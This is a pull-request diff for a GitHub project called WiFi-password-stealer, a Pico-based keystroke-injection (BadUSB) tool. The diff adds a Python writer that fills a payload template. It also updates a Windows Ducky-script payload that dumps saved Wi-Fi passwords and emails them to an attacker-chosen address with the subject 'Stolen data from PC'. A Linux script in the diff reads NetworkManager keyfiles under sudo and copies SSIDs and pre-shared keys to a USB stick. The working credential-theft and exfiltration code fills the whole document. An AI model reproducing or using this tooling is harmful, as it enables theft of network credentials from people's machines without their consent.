Merge pull request #2 from AleksaMCode/feat/payload-writer

Feat/payload writer

Author: AleksaMCode

README.md

@@ -22,6 +22,7 @@
       - [Quick overview of the payload](#quick-overview-of-the-payload)
     - [Exfiltrated data formatting](#exfiltrated-data-formatting)
   - [USB Mass Storage Device Problem](#usb-mass-storage-device-problem)
+  - [Payload Writer](#payload-writer)
   - [Limitations/Drawbacks](#limitationsdrawbacks)
   - [To-Do List](#to-do-list)
 
@@ -114,10 +115,10 @@ https://github.com/AleksaMCode/WiFi-password-stealer/blob/a90ffb208e6a09d1b0ae44
 <p align="justify">In order to run the <a href="https://github.com/AleksaMCode/WiFi-password-stealer/blob/main/scripts/wifi_passwords_print.sh"><code>wifi_passwords_print.sh</code></a> script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:</p>
 
 ```bash
-echo PASSWORD | sudo -S sh wifi_passwords_print.sh
+echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
 ```
 
-where `PASSWORD` is your account's password.
+where `PASSWORD` is your account's password and `USBSTICK` is the name for your USB device.
 
 #### Quick overview of the payload
 <p align="justify"><b>NetworkManager</b> is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses <code>.ini-style</code> keyfile format and stores network configuration profiles. The <b>keyfile</b> is a plugin that supports all the connection types and capabilities that <b>NetworkManager</b> has. The files are located in <i>/etc/NetworkManager/system-connections/</i>. Based on the <b>keyfile</b> format, the payload uses the <code>grep</code> command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used (<code>(?<=keyword)</code>). While the positive lookbehind assertion will match at a certain position in the string, <a href="https://en.wikipedia.org/wiki/Viz.">sc.</a> at a position right after the <i>keyword</i> without making that text itself part of the match, the regex <code>(?<=keyword).*</code> will match any text after the <i>keyword</i>. This allows the payload to match the values after <b>SSID</b> and <b>psk</b> (<a href="https://en.wikipedia.org/wiki/Pre-shared_key">pre-shared key</a>) keywords.</p>
@@ -141,6 +142,13 @@ https://github.com/AleksaMCode/WiFi-password-stealer/blob/f5b3b11328764eb07d765a
 > <li>Don't solder the pins because you will probably want to change/update the payload at some point.</li>
 > </ul>
 
+## Payload Writer
+<p align="justify">When creating a functioning payload file, you can use the <code>writer.py</code> script, or you can manually change the template file. In order to run the script successfully you will need to pass in addition to the script wile name, a name of the OS (<i>windows</i> or <i>linux</i>) and the name of the payload file (e.q. <i>payload.dd</i>). Below you can find an example how to run the script when creating a Windows payload.</p>
+
+```bash
+python3 writer.py windows payload.dd
+```
+
 ## Limitations/Drawbacks
 <ul>
 <li><p align="justify"><s>This pico-ducky currently works only on Windows OS.</p></s></li>

payload/payload_windows.template.dd

@@ -28,7 +28,7 @@ STRING Format-Table -AutoSize
 ENTER
 STRING Out-File -FilePath .\wifi_pass.txt -InputObject $res -Encoding ASCII -Width 50
 ENTER
-STRING Send-MailMessage -To RECEIVER_EMAIL -from SENDER_EMAIL -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL, $(PASSWORD | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587
+STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587
 ENTER
 DELAY 500
 STRING Remove-Item .\wifi_pass.txt

payload/writer.py

@@ -0,0 +1,99 @@
+import sys
+
+ARGS = sys.argv[1:]
+SYSTEM_LIST = ["windows", "linux"]
+
+
+def windows_writer():
+    payload = []
+    try:
+        payload = open(ARGS[1], 'r').readlines()
+        SMTP_SERVER = "smtp.mail.yahoo.com"
+        SMTP_PORT = 587
+        EMAIL_SUBJECT = "Stolen data from PC"
+        EMAIL_BODY = "Exploited data is stored in the attachment."
+
+        value = input(f"Select a SMTP server (default '{SMTP_SERVER}'): ")
+        if value == "":
+            value = SMTP_SERVER
+        payload[30] = payload[30].replace("SMTP_SERVER", value)
+
+        value = input(f"Select a SMTP server port (default '{SMTP_PORT}'): ")
+        if value == "":
+            value = SMTP_PORT
+        payload[30] = payload[30].replace("SMTP_PORT", value)
+
+        done = False
+        while not done:
+            value = input(f"Select a SMTP server password: ")
+            if value != "":
+                payload[30] = payload[30].replace("SMTP_PASSWORD", value)
+                done = True
+
+        done = False
+        while not done:
+            value = input(f"Select a SMTP server email: ")
+            if value != "":
+                payload[30] = payload[30].replace("SENDER_EMAIL", value)
+                done = True
+
+        done = False
+        while not done:
+            value = input(f"Select a receiver email: ")
+            if value != "":
+                payload[30] = payload[30].replace("RECEIVER_EMAIL", value)
+                done = True
+
+        value = input(f"Select an email subject (default '{EMAIL_SUBJECT}'): ")
+        if value == "":
+            value = EMAIL_SUBJECT
+        payload[30] = payload[30].replace("EMAIL_SUBJECT", value)
+
+        value = input(f"Select an email body (default '{EMAIL_BODY}'): ")
+        if value == "":
+            value = EMAIL_BODY
+        payload[30] = payload[30].replace("EMAIL_BODY", value)
+    except FileNotFoundError:
+        exit(f"File '{ARGS[1]}' is missing.")
+
+    with open(ARGS[1], 'w') as f:
+        for line in payload:
+            f.write(line)
+
+
+def linux_writer():
+    payload = []
+
+    try:
+        payload = open(ARGS[1], 'r').readlines()
+
+        done = False
+        while not done:
+            value = input(f"Select you password: ")
+            if value != "":
+                payload[6] = payload[6].replace("PASSWORD", value)
+                payload[8] = payload[8].replace("PASSWORD", value)
+                done = True
+
+        done = False
+        while not done:
+            value = input(f"Select you USB stick name: ")
+            if value != "":
+                payload[2] = payload[2].replace("USBSTICK", value)
+                payload[10] = payload[10].replace("USBSTICK", value)
+                done = True
+    except FileNotFoundError:
+        exit(f"File '{ARGS[1]}' is missing.")
+
+    with open(ARGS[1], 'w') as f:
+        for line in payload:
+            f.write(line)
+
+
+if not ARGS or len(ARGS) != 2 or ARGS[0] not in SYSTEM_LIST:
+    exit("Unknown system argument(s) used.")
+
+if ARGS[0] == SYSTEM_LIST[0]:
+    windows_writer()
+else:
+    linux_writer()

scripts/wifi_passwords_print.sh

@@ -1,7 +1,7 @@
 #!/bin/bash
-echo "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt
+echo "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/$1/wifi_pass.txt
 
 for FILE in /etc/NetworkManager/system-connections/*
 do
     echo "$(cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t  $(cat "$FILE" | grep -oP '(?<=psk=).*')"
-done >> /media/$(hostname)/USBSTICK/wifi_pass.txt
+done >> /media/$(hostname)/$1/wifi_pass.txt